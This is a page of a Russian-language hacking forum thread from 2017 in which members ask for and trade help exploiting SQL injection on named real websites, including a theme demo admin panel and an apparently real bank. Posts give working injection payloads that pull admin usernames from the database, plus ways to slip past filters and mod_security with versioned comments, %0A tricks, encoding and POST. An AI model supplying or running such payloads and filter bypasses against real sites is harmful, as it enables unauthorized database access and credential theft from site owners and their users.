HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1891  
Старый 31.05.2017, 08:48
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Добрый подскажите, как раскрутить данную sql (параметр id)

.SpoilerTarget" type="button">Spoiler: посмотреть
Авторизация:

Код:
Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)
Пробую:

Код:
Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl
но в ответ постоянная загрузка и отрубает (Error - Connection reset)

Подскажите что фильтрует и как обойти?

обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
 
Ответить с цитированием

  #1892  
Старый 31.05.2017, 20:51
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Добрый подскажите, как раскрутить данную sql (параметр id)
Spoiler: посмотреть
Авторизация:
Код:
Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)
Пробую:
Код:
Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl
но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
Зачем идти в Москву через Китай

Код:
Code:
http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF
Бапассить select можно старыми добрыми комментами

А байпассить функции с помощью %0A перед ()

UPD: И ты используешь error-based хотя здесь самый обычный UNION
 
Ответить с цитированием

  #1893  
Старый 31.05.2017, 22:36
extjs
Guest
Сообщений: n/a
Провел на форуме:
10638

Репутация: 0
По умолчанию

/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23

Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
 
Ответить с цитированием

  #1894  
Старый 01.06.2017, 01:29
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Цитата:
Сообщение от extjs  
extjs said:

/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше
 
Ответить с цитированием

  #1895  
Старый 01.06.2017, 09:13
mcmagnus
Guest
Сообщений: n/a
Провел на форуме:
243

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  
brown said:

google phpbb 3.0.5 exploit
Благодарю, но хотелось бы развернутого ответа, если не сложно.
 
Ответить с цитированием

  #1896  
Старый 01.06.2017, 09:49
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от extjs  
extjs said:

/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
/!*50000bla bla bla*/
 
Ответить с цитированием

  #1897  
Старый 01.06.2017, 13:49
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от extjs  
extjs said:

/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
попробуй передать id с помощью POST

Попробуй url encode

Попробуй char encode
 
Ответить с цитированием

  #1898  
Старый 10.06.2017, 00:16
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

всем привет,

кто может, помогиет раскрутить эту скулю:

Код:
Code:
http://www.sala amsombank.com/pages.php?id=\
 
Ответить с цитированием

  #1899  
Старый 10.06.2017, 02:25
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от sepo  
sepo said:

всем привет,
кто может, помогиет раскрутить эту скулю:
Код:
Code:
http://www.sala amsombank.com/pages.php?id=\
с чего вы решили, что она раскручивабельна?
 
Ответить с цитированием

  #1900  
Старый 10.06.2017, 03:21
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

Цитата:
Сообщение от ACat  
ACat said:

с чего вы решили, что она раскручивабельна?
всмысле??
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ